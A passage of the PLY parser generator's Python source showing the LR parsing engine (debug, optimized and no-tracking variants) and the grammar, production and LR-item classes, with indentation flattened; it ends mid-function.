def lineno(self,n):
return getattr(self.slice[n],"lineno",0)
def set_lineno(self,n,lineno):
self.slice[n].lineno = lineno
def linespan(self,n):
startline = getattr(self.slice[n],"lineno",0)
endline = getattr(self.slice[n],"endlineno",startline)
return startline,endline
def lexpos(self,n):
return getattr(self.slice[n],"lexpos",0)
def lexspan(self,n):
startpos = getattr(self.slice[n],"lexpos",0)
endpos = getattr(self.slice[n],"endlexpos",startpos)
return startpos,endpos
def error(self):
raise SyntaxError
# -----------------------------------------------------------------------------
# == LRParser ==
#
# The LR Parsing engine.
# -----------------------------------------------------------------------------
class LRParser:
def __init__(self,lrtab,errorf):
self.productions = lrtab.lr_productions
self.action = lrtab.lr_action
self.goto = lrtab.lr_goto
self.errorfunc = errorf
def errok(self):
self.errorok = 1
def restart(self):
del self.statestack[:]
del self.symstack[:]
sym = YaccSymbol()
sym.type = '$end'
self.symstack.append(sym)
self.statestack.append(0)
def parse(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
if debug or yaccdevel:
if isinstance(debug,int):
debug = PlyLogger(sys.stderr)
return self.parsedebug(input,lexer,debug,tracking,tokenfunc)
elif tracking:
return self.parseopt(input,lexer,debug,tracking,tokenfunc)
else:
return self.parseopt_notrack(input,lexer,debug,tracking,tokenfunc)
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parsedebug().
#
# This is the debugging enabled version of parse(). All changes made to the
# parsing engine should be made here. For the non-debugging version,
# copy this code to a method parseopt() and delete all of the sections
# enclosed in:
#
# #--! DEBUG
# statements
# #--! DEBUG
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def parsedebug(self,input=None,lexer=None,debug=None,tracking=0,tokenfunc=None):
lookahead = None # Current lookahead symbol
lookaheadstack = [ ] # Stack of lookahead symbols
actions = self.action # Local reference to action table (to avoid lookup on self.)
goto = self.goto # Local reference to goto table (to avoid lookup on self.)
prod = self.productions # Local reference to production list (to avoid lookup on self.)
pslice = YaccProduction(None) # Production object passed to grammar rules
errorcount = 0 # Used during error recovery
# --! DEBUG
debug.info("PLY: PARSE DEBUG START")
# --! DEBUG
# If no lexer was given, we will try to use the lex module
if not lexer:
lex = load_ply_lex()
lexer = lex.lexer
# Set up the lexer and parser objects on pslice
pslice.lexer = lexer
pslice.parser = self
# If input was supplied, pass to lexer
if input is not None:
lexer.input(input)
if tokenfunc is None:
# Tokenize function
get_token = lexer.token
else:
get_token = tokenfunc
# Set up the state and symbol stacks
statestack = [ ] # Stack of parsing states
self.statestack = statestack
symstack = [ ] # Stack of grammar symbols
self.symstack = symstack
pslice.stack = symstack # Put in the production
errtoken = None # Err token
# The start state is assumed to be (0,$end)
statestack.append(0)
sym = YaccSymbol()
sym.type = "$end"
symstack.append(sym)
state = 0
while 1:
# Get the next symbol on the input. If a lookahead symbol
# is already set, we just use that. Otherwise, we'll pull
# the next token off of the lookaheadstack or from the lexer
# --! DEBUG
debug.debug('')
debug.debug('State : %s', state)
# --! DEBUG
if not lookahead:
if not lookaheadstack:
lookahead = get_token() # Get the next token
else:
lookahead = lookaheadstack.pop()
if not lookahead:
lookahead = YaccSymbol()
lookahead.type = "$end"
# --! DEBUG
debug.debug('Stack : %s',
("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
# --! DEBUG
# Check the action table
ltype = lookahead.type
t = actions[state].get(ltype)
if t is not None:
if t > 0:
# shift a symbol on the stack
statestack.append(t)
state = t
# --! DEBUG
debug.debug("Action : Shift and goto state %s", t)
# --! DEBUG
symstack.append(lookahead)
lookahead = None
# Decrease error count on successful shift
if errorcount: errorcount -=1
continue
if t < 0:
# reduce a symbol on the stack, emit a production
p = prod[-t]
pname = p.name
plen = p.len
# Get production function
sym = YaccSymbol()
sym.type = pname # Production name
sym.value = None
# --! DEBUG
if plen:
debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, "["+",".join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+"]",-t)
else:
debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, [],-t)
# --! DEBUG
if plen:
targ = symstack[-plen-1:]
targ[0] = sym
# --! TRACKING
if tracking:
t1 = targ[1]
sym.lineno = t1.lineno
sym.lexpos = t1.lexpos
t1 = targ[-1]
sym.endlineno = getattr(t1,"endlineno",t1.lineno)
sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
# --! TRACKING
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# below as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
del symstack[-plen:]
del statestack[-plen:]
p.callable(pslice)
# --! DEBUG
debug.info("Result : %s", format_result(pslice[0]))
# --! DEBUG
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
else:
# --! TRACKING
if tracking:
sym.lineno = lexer.lineno
sym.lexpos = lexer.lexpos
# --! TRACKING
targ = [ sym ]
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# above as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
p.callable(pslice)
# --! DEBUG
debug.info("Result : %s", format_result(pslice[0]))
# --! DEBUG
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
if t == 0:
n = symstack[-1]
result = getattr(n,"value",None)
# --! DEBUG
debug.info("Done : Returning %s", format_result(result))
debug.info("PLY: PARSE DEBUG END")
# --! DEBUG
return result
if t == None:
# --! DEBUG
debug.error('Error : %s',
("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
# --! DEBUG
# We have some kind of parsing error here. To handle
# this, we are going to push the current token onto
# the tokenstack and replace it with an 'error' token.
# If there are any synchronization rules, they may
# catch it.
#
# In addition to pushing the error token, we call call
# the user defined p_error() function if this is the
# first syntax error. This function is only called if
# errorcount == 0.
if errorcount == 0 or self.errorok:
errorcount = error_count
self.errorok = 0
errtoken = lookahead
if errtoken.type == "$end":
errtoken = None # End of file!
if self.errorfunc:
global errok,token,restart
errok = self.errok # Set some special functions available in error recovery
token = get_token
restart = self.restart
if errtoken and not hasattr(errtoken,'lexer'):
errtoken.lexer = lexer
tok = self.errorfunc(errtoken)
del errok, token, restart # Delete special functions
if self.errorok:
# User must have done some kind of panic
# mode recovery on their own. The
# returned token is the next lookahead
lookahead = tok
errtoken = None
continue
else:
if errtoken:
if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
else: lineno = 0
if lineno:
sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
else:
sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
else:
sys.stderr.write("yacc: Parse error in input. EOF\n")
return
else:
errorcount = error_count
# case 1: the statestack only has 1 entry on it. If we're in this state, the
# entire parse has been rolled back and we're completely hosed. The token is
# discarded and we just keep going.
if len(statestack) <= 1 and lookahead.type != "$end":
lookahead = None
errtoken = None
state = 0
# Nuke the pushback stack
del lookaheadstack[:]
continue
# case 2: the statestack has a couple of entries on it, but we're
# at the end of the file. nuke the top entry and generate an error token
# Start nuking entries on the stack
if lookahead.type == "$end":
# Whoa. We're really hosed here. Bail out
return
if lookahead.type != 'error':
sym = symstack[-1]
if sym.type == 'error':
# Hmmm. Error is on top of stack, we'll just nuke input
# symbol and continue
lookahead = None
continue
t = YaccSymbol()
t.type = 'error'
if hasattr(lookahead,"lineno"):
t.lineno = lookahead.lineno
t.value = lookahead
lookaheadstack.append(lookahead)
lookahead = t
else:
symstack.pop()
statestack.pop()
state = statestack[-1] # Potential bug fix
continue
# Call an error function here
raise RuntimeError("yacc: internal parser error!!!\n")
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parseopt().
#
# Optimized version of parse() method. DO NOT EDIT THIS CODE DIRECTLY.
# Edit the debug version above, then copy any modifications to the method
# below while removing #--! DEBUG sections.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def parseopt(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
lookahead = None # Current lookahead symbol
lookaheadstack = [ ] # Stack of lookahead symbols
actions = self.action # Local reference to action table (to avoid lookup on self.)
goto = self.goto # Local reference to goto table (to avoid lookup on self.)
prod = self.productions # Local reference to production list (to avoid lookup on self.)
pslice = YaccProduction(None) # Production object passed to grammar rules
errorcount = 0 # Used during error recovery
# If no lexer was given, we will try to use the lex module
if not lexer:
lex = load_ply_lex()
lexer = lex.lexer
# Set up the lexer and parser objects on pslice
pslice.lexer = lexer
pslice.parser = self
# If input was supplied, pass to lexer
if input is not None:
lexer.input(input)
if tokenfunc is None:
# Tokenize function
get_token = lexer.token
else:
get_token = tokenfunc
# Set up the state and symbol stacks
statestack = [ ] # Stack of parsing states
self.statestack = statestack
symstack = [ ] # Stack of grammar symbols
self.symstack = symstack
pslice.stack = symstack # Put in the production
errtoken = None # Err token
# The start state is assumed to be (0,$end)
statestack.append(0)
sym = YaccSymbol()
sym.type = '$end'
symstack.append(sym)
state = 0
while 1:
# Get the next symbol on the input. If a lookahead symbol
# is already set, we just use that. Otherwise, we'll pull
# the next token off of the lookaheadstack or from the lexer
if not lookahead:
if not lookaheadstack:
lookahead = get_token() # Get the next token
else:
lookahead = lookaheadstack.pop()
if not lookahead:
lookahead = YaccSymbol()
lookahead.type = '$end'
# Check the action table
ltype = lookahead.type
t = actions[state].get(ltype)
if t is not None:
if t > 0:
# shift a symbol on the stack
statestack.append(t)
state = t
symstack.append(lookahead)
lookahead = None
# Decrease error count on successful shift
if errorcount: errorcount -=1
continue
if t < 0:
# reduce a symbol on the stack, emit a production
p = prod[-t]
pname = p.name
plen = p.len
# Get production function
sym = YaccSymbol()
sym.type = pname # Production name
sym.value = None
if plen:
targ = symstack[-plen-1:]
targ[0] = sym
# --! TRACKING
if tracking:
t1 = targ[1]
sym.lineno = t1.lineno
sym.lexpos = t1.lexpos
t1 = targ[-1]
sym.endlineno = getattr(t1,"endlineno",t1.lineno)
sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
# --! TRACKING
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# below as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
del symstack[-plen:]
del statestack[-plen:]
p.callable(pslice)
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
else:
# --! TRACKING
if tracking:
sym.lineno = lexer.lineno
sym.lexpos = lexer.lexpos
# --! TRACKING
targ = [ sym ]
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# above as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
p.callable(pslice)
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
if t == 0:
n = symstack[-1]
return getattr(n,"value",None)
if t == None:
# We have some kind of parsing error here. To handle
# this, we are going to push the current token onto
# the tokenstack and replace it with an 'error' token.
# If there are any synchronization rules, they may
# catch it.
#
# In addition to pushing the error token, we call call
# the user defined p_error() function if this is the
# first syntax error. This function is only called if
# errorcount == 0.
if errorcount == 0 or self.errorok:
errorcount = error_count
self.errorok = 0
errtoken = lookahead
if errtoken.type == '$end':
errtoken = None # End of file!
if self.errorfunc:
global errok,token,restart
errok = self.errok # Set some special functions available in error recovery
token = get_token
restart = self.restart
if errtoken and not hasattr(errtoken,'lexer'):
errtoken.lexer = lexer
tok = self.errorfunc(errtoken)
del errok, token, restart # Delete special functions
if self.errorok:
# User must have done some kind of panic
# mode recovery on their own. The
# returned token is the next lookahead
lookahead = tok
errtoken = None
continue
else:
if errtoken:
if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
else: lineno = 0
if lineno:
sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
else:
sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
else:
sys.stderr.write("yacc: Parse error in input. EOF\n")
return
else:
errorcount = error_count
# case 1: the statestack only has 1 entry on it. If we're in this state, the
# entire parse has been rolled back and we're completely hosed. The token is
# discarded and we just keep going.
if len(statestack) <= 1 and lookahead.type != '$end':
lookahead = None
errtoken = None
state = 0
# Nuke the pushback stack
del lookaheadstack[:]
continue
# case 2: the statestack has a couple of entries on it, but we're
# at the end of the file. nuke the top entry and generate an error token
# Start nuking entries on the stack
if lookahead.type == '$end':
# Whoa. We're really hosed here. Bail out
return
if lookahead.type != 'error':
sym = symstack[-1]
if sym.type == 'error':
# Hmmm. Error is on top of stack, we'll just nuke input
# symbol and continue
lookahead = None
continue
t = YaccSymbol()
t.type = 'error'
if hasattr(lookahead,"lineno"):
t.lineno = lookahead.lineno
t.value = lookahead
lookaheadstack.append(lookahead)
lookahead = t
else:
symstack.pop()
statestack.pop()
state = statestack[-1] # Potential bug fix
continue
# Call an error function here
raise RuntimeError("yacc: internal parser error!!!\n")
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# parseopt_notrack().
#
# Optimized version of parseopt() with line number tracking removed.
# DO NOT EDIT THIS CODE DIRECTLY. Copy the optimized version and remove
# code in the #--! TRACKING sections
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def parseopt_notrack(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
lookahead = None # Current lookahead symbol
lookaheadstack = [ ] # Stack of lookahead symbols
actions = self.action # Local reference to action table (to avoid lookup on self.)
goto = self.goto # Local reference to goto table (to avoid lookup on self.)
prod = self.productions # Local reference to production list (to avoid lookup on self.)
pslice = YaccProduction(None) # Production object passed to grammar rules
errorcount = 0 # Used during error recovery
# If no lexer was given, we will try to use the lex module
if not lexer:
lex = load_ply_lex()
lexer = lex.lexer
# Set up the lexer and parser objects on pslice
pslice.lexer = lexer
pslice.parser = self
# If input was supplied, pass to lexer
if input is not None:
lexer.input(input)
if tokenfunc is None:
# Tokenize function
get_token = lexer.token
else:
get_token = tokenfunc
# Set up the state and symbol stacks
statestack = [ ] # Stack of parsing states
self.statestack = statestack
symstack = [ ] # Stack of grammar symbols
self.symstack = symstack
pslice.stack = symstack # Put in the production
errtoken = None # Err token
# The start state is assumed to be (0,$end)
statestack.append(0)
sym = YaccSymbol()
sym.type = '$end'
symstack.append(sym)
state = 0
while 1:
# Get the next symbol on the input. If a lookahead symbol
# is already set, we just use that. Otherwise, we'll pull
# the next token off of the lookaheadstack or from the lexer
if not lookahead:
if not lookaheadstack:
lookahead = get_token() # Get the next token
else:
lookahead = lookaheadstack.pop()
if not lookahead:
lookahead = YaccSymbol()
lookahead.type = '$end'
# Check the action table
ltype = lookahead.type
t = actions[state].get(ltype)
if t is not None:
if t > 0:
# shift a symbol on the stack
statestack.append(t)
state = t
symstack.append(lookahead)
lookahead = None
# Decrease error count on successful shift
if errorcount: errorcount -=1
continue
if t < 0:
# reduce a symbol on the stack, emit a production
p = prod[-t]
pname = p.name
plen = p.len
# Get production function
sym = YaccSymbol()
sym.type = pname # Production name
sym.value = None
if plen:
targ = symstack[-plen-1:]
targ[0] = sym
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# below as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
del symstack[-plen:]
del statestack[-plen:]
p.callable(pslice)
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
else:
targ = [ sym ]
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# The code enclosed in this section is duplicated
# above as a performance optimization. Make sure
# changes get made in both locations.
pslice.slice = targ
try:
# Call the grammar rule with our special slice object
p.callable(pslice)
symstack.append(sym)
state = goto[statestack[-1]][pname]
statestack.append(state)
except SyntaxError:
# If an error was set. Enter error recovery state
lookaheadstack.append(lookahead)
symstack.pop()
statestack.pop()
state = statestack[-1]
sym.type = 'error'
lookahead = sym
errorcount = error_count
self.errorok = 0
continue
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
if t == 0:
n = symstack[-1]
return getattr(n,"value",None)
if t == None:
# We have some kind of parsing error here. To handle
# this, we are going to push the current token onto
# the tokenstack and replace it with an 'error' token.
# If there are any synchronization rules, they may
# catch it.
#
# In addition to pushing the error token, we call call
# the user defined p_error() function if this is the
# first syntax error. This function is only called if
# errorcount == 0.
if errorcount == 0 or self.errorok:
errorcount = error_count
self.errorok = 0
errtoken = lookahead
if errtoken.type == '$end':
errtoken = None # End of file!
if self.errorfunc:
global errok,token,restart
errok = self.errok # Set some special functions available in error recovery
token = get_token
restart = self.restart
if errtoken and not hasattr(errtoken,'lexer'):
errtoken.lexer = lexer
tok = self.errorfunc(errtoken)
del errok, token, restart # Delete special functions
if self.errorok:
# User must have done some kind of panic
# mode recovery on their own. The
# returned token is the next lookahead
lookahead = tok
errtoken = None
continue
else:
if errtoken:
if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
else: lineno = 0
if lineno:
sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
else:
sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
else:
sys.stderr.write("yacc: Parse error in input. EOF\n")
return
else:
errorcount = error_count
# case 1: the statestack only has 1 entry on it. If we're in this state, the
# entire parse has been rolled back and we're completely hosed. The token is
# discarded and we just keep going.
if len(statestack) <= 1 and lookahead.type != '$end':
lookahead = None
errtoken = None
state = 0
# Nuke the pushback stack
del lookaheadstack[:]
continue
# case 2: the statestack has a couple of entries on it, but we're
# at the end of the file. nuke the top entry and generate an error token
# Start nuking entries on the stack
if lookahead.type == '$end':
# Whoa. We're really hosed here. Bail out
return
if lookahead.type != 'error':
sym = symstack[-1]
if sym.type == 'error':
# Hmmm. Error is on top of stack, we'll just nuke input
# symbol and continue
lookahead = None
continue
t = YaccSymbol()
t.type = 'error'
if hasattr(lookahead,"lineno"):
t.lineno = lookahead.lineno
t.value = lookahead
lookaheadstack.append(lookahead)
lookahead = t
else:
symstack.pop()
statestack.pop()
state = statestack[-1] # Potential bug fix
continue
# Call an error function here
raise RuntimeError("yacc: internal parser error!!!\n")
# -----------------------------------------------------------------------------
# === Grammar Representation ===
#
# The following functions, classes, and variables are used to represent and
# manipulate the rules that make up a grammar.
# -----------------------------------------------------------------------------
import re
# regex matching identifiers
_is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$')
# -----------------------------------------------------------------------------
# class Production:
#
# This class stores the raw information about a single production or grammar rule.
# A grammar rule refers to a specification such as this:
#
# expr : expr PLUS term
#
# Here are the basic attributes defined on all productions
#
# name - Name of the production. For example 'expr'
# prod - A list of symbols on the right side ['expr','PLUS','term']
# prec - Production precedence level
# number - Production number.
# func - Function that executes on reduce
# file - File where production function is defined
# lineno - Line number where production function is defined
#
# The following attributes are defined or optional.
#
# len - Length of the production (number of symbols on right hand side)
# usyms - Set of unique symbols found in the production
# -----------------------------------------------------------------------------
class Production(object):
reduced = 0
def __init__(self,number,name,prod,precedence=('right',0),func=None,file='',line=0):
self.name = name
self.prod = tuple(prod)
self.number = number
self.func = func
self.callable = None
self.file = file
self.line = line
self.prec = precedence
# Internal settings used during table construction
self.len = len(self.prod) # Length of the production
# Create a list of unique production symbols used in the production
self.usyms = [ ]
for s in self.prod:
if s not in self.usyms:
self.usyms.append(s)
# List of all LR items for the production
self.lr_items = []
self.lr_next = None
# Create a string representation
if self.prod:
self.str = "%s -> %s" % (self.name," ".join(self.prod))
else:
self.str = "%s -> <empty>" % self.name
def __str__(self):
return self.str
def __repr__(self):
return "Production("+str(self)+")"
def __len__(self):
return len(self.prod)
def __nonzero__(self):
return 1
def __getitem__(self,index):
return self.prod[index]
# Return the nth lr_item from the production (or None if at the end)
def lr_item(self,n):
if n > len(self.prod): return None
p = LRItem(self,n)
# Precompute the list of productions immediately following. Hack. Remove later
try:
p.lr_after = Prodnames[p.prod[n+1]]
except (IndexError,KeyError):
p.lr_after = []
try:
p.lr_before = p.prod[n-1]
except IndexError:
p.lr_before = None
return p
# Bind the production function name to a callable
def bind(self,pdict):
if self.func:
self.callable = pdict[self.func]
# This class serves as a minimal standin for Production objects when
# reading table data from files. It only contains information
# actually used by the LR parsing engine, plus some additional
# debugging information.
class MiniProduction(object):
def __init__(self,str,name,len,func,file,line):
self.name = name
self.len = len
self.func = func
self.callable = None
self.file = file
self.line = line
self.str = str
def __str__(self):
return self.str
def __repr__(self):
return "MiniProduction(%s)" % self.str
# Bind the production function name to a callable
def bind(self,pdict):
if self.func:
self.callable = pdict[self.func]
# -----------------------------------------------------------------------------
# class LRItem
#
# This class represents a specific stage of parsing a production rule. For
# example:
#
# expr : expr . PLUS term
#
# In the above, the "." represents the current location of the parse. Here
# basic attributes:
#
# name - Name of the production. For example 'expr'
# prod - A list of symbols on the right side ['expr','.', 'PLUS','term']
# number - Production number.
#
# lr_next Next LR item. Example, if we are ' expr -> expr . PLUS term'
# then lr_next refers to 'expr -> expr PLUS . term'
# lr_index - LR item index (location of the ".") in the prod list.
# lookaheads - LALR lookahead symbols for this item
# len - Length of the production (number of symbols on right hand side)
# lr_after - List of all productions that immediately follow
# lr_before - Grammar symbol immediately before
# -----------------------------------------------------------------------------
class LRItem(object):
def __init__(self,p,n):
self.name = p.name
self.prod = list(p.prod)
self.number = p.number
self.lr_index = n
self.lookaheads = { }
self.prod.insert(n,".")
self.prod = tuple(self.prod)
self.len = len(self.prod)
self.usyms = p.usyms
def __str__(self):
if self.prod:
s = "%s -> %s" % (self.name," ".join(self.prod))
else:
s = "%s -> <empty>" % self.name
return s
def __repr__(self):
return "LRItem("+str(self)+")"
# -----------------------------------------------------------------------------
# rightmost_terminal()
#
# Return the rightmost terminal from a list of symbols. Used in add_production()
# -----------------------------------------------------------------------------
def rightmost_terminal(symbols, terminals):
i = len(symbols) - 1
while i >= 0:
if symbols[i] in terminals:
return symbols[i]
i -= 1
return None
# -----------------------------------------------------------------------------
# === GRAMMAR CLASS ===
#
# The following class represents the contents of the specified grammar along
# with various computed properties such as first sets, follow sets, LR items, etc.
# This data is used for critical parts of the table generation process later.
# -----------------------------------------------------------------------------
class GrammarError(YaccError): pass
class Grammar(object):
def __init__(self,terminals):
self.Productions = [None] # A list of all of the productions. The first
# entry is always reserved for the purpose of
# building an augmented grammar
self.Prodnames = { } # A dictionary mapping the names of nonterminals to a list of all
# productions of that nonterminal.
self.Prodmap = { } # A dictionary that is only used to detect duplicate
# productions.
self.Terminals = { } # A dictionary mapping the names of terminal symbols to a
# list of the rules where they are used.
for term in terminals:
self.Terminals[term] = []
self.Terminals['error'] = []
self.Nonterminals = { } # A dictionary mapping names of nonterminals to a list
# of rule numbers where they are used.
self.First = { } # A dictionary of precomputed FIRST(x) symbols
self.Follow = { } # A dictionary of precomputed FOLLOW(x) symbols
self.Precedence = { } # Precedence rules for each terminal. Contains tuples of the
# form ('right',level) or ('nonassoc', level) or ('left',level)
self.UsedPrecedence = { } # Precedence rules that were actually used by the grammer.
# This is only used to provide error checking and to generate
# a warning about unused precedence rules.
self.Start = None # Starting symbol for the grammar
def __len__(self):
return len(self.Productions)
def __getitem__(self,index):
return self.Productions[index]
# -----------------------------------------------------------------------------
# set_precedence()
#
# Sets the precedence for a given terminal. assoc is the associativity such as
# 'left','right', or 'nonassoc'. level is a numeric level.
#
# -----------------------------------------------------------------------------
def set_precedence(self,term,assoc,level):
assert self.Productions == [None],"Must call set_precedence() before add_production()"
if term in self.Precedence:
raise GrammarError("Precedence already specified for terminal '%s'" % term)
if assoc not in ['left','right','nonassoc']:
raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'")
self.Precedence[term] = (assoc,level)
# -----------------------------------------------------------------------------
# add_production()
#
# Given an action function, this function assembles a production rule and
# computes its precedence level.
#
# The production rule is supplied as a list of symbols. For example,
# a rule such as 'expr : expr PLUS term' has a production name of 'expr' and
# symbols ['expr','PLUS','term'].
#
# Precedence is determined by the precedence of the right-most non-terminal
# or the precedence of a terminal specified by %prec.
#
# A variety of error checks are performed to make sure production symbols
# are valid and that %prec is used correctly.
# -----------------------------------------------------------------------------
def add_production(self,prodname,syms,func=None,file='',line=0):
if prodname in self.Terminals:
raise GrammarError("%s:%d: Illegal rule name '%s'. Already defined as a token" % (file,line,prodname))
if prodname == 'error':
raise GrammarError("%s:%d: Illegal rule name '%s'. error is a reserved word" % (file,line,prodname))
if not _is_identifier.match(prodname):
raise GrammarError("%s:%d: Illegal rule name '%s'" % (file,line,prodname))
# Look for literal tokens
for n,s in enumerate(syms):
if s[0] in "'\"":
try:
c = eval(s)
if (len(c) > 1):
raise GrammarError("%s:%d: Literal token %s in rule '%s' may only be a single character" % (file,line,s, prodname))
if not c in self.Terminals:
self.Terminals[c] = []
syms[n] = c
continue
except SyntaxError:
pass
if not _is_identifier.match(s) and s != '%prec':
raise GrammarError("%s:%d: Illegal name '%s' in rule '%s'" % (file,line,s, prodname))
# Determine the precedence level
if '%prec' in syms:
if syms[-1] == '%prec':
raise GrammarError("%s:%d: Syntax error. Nothing follows %%prec" % (file,line))
if syms[-2] != '%prec':
raise GrammarError("%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule" % (file,line))
precname = syms[-1]
prodprec = self.Precedence.get(precname,None)
if not prodprec:
raise GrammarError("%s:%d: Nothing known about the precedence of '%s'" % (file,line,precname))
else:
self.UsedPrecedence[precname] = 1
del syms[-2:] # Drop %prec from the rule
else:
# If no %prec, precedence is determined by the rightmost terminal symbol
precname = rightmost_terminal(syms,self.Terminals)
prodprec = self.Precedence.get(precname,('right',0))
# See if the rule is already in the rulemap
map = "%s -> %s" % (prodname,syms)
if map in self.Prodmap:
m = self.Prodmap[map]
raise GrammarError("%s:%d: Duplicate rule %s. " % (file,line, m) +
"Previous definition at %s:%d" % (m.file, m.line))
# From this point on, everything is valid. Create a new Production instance
pnumber = len(self.Productions)
if not prodname in self.Nonterminals:
self.Nonterminals[prodname] = [ ]
# Add the production number to Terminals and Nonterminals
for t in syms:
if t in self.Terminals:
self.Terminals[t].append(pnumber)
else:
if not t in self.Nonterminals:
self.Nonterminals[t] = [ ]
self.Nonterminals[t].append(pnumber)
# Create a production and add it to the list of productions
p = Production(pnumber,prodname,syms,prodprec,func,file,line)
self.Productions.append(p)
self.Prodmap[map] = p
# Add to the global productions list
try:
self.Prodnames[prodname].append(p)
except KeyError:
self.Prodnames[prodname] = [ p ]
return 0
# -----------------------------------------------------------------------------
# set_start()
#
# Sets the starting symbol and creates the augmented grammar. Production
# rule 0 is S' -> start where start is the start symbol.
# -----------------------------------------------------------------------------
def set_start(self,start=None):
if not start:
start = self.Productions[1].name
if start not in self.Nonterminals:
raise GrammarError("start symbol %s undefined" % start)
self.Productions[0] = Production(0,"S'",[start])
self.Nonterminals[start].append(0)
self.Start = start
# -----------------------------------------------------------------------------
# find_unreachable()
#
# Find all of the nonterminal symbols that can't be reached from the starting
# symbol. Returns a list of nonterminals that can't be reached.
# -----------------------------------------------------------------------------
def find_unreachable(self):
# Mark all symbols that are reachable from a symbol s
def mark_reachable_from(s):
if reachable[s]:
# We've already reached symbol s.
return
reachable[s] = 1
for p in self.Prodnames.get(s,[]):
for r in p.prod:
mark_reachable_from(r)
reachable = { }
for s in list(self.Terminals) + list(self.Nonterminals):
reachable[s] = 0
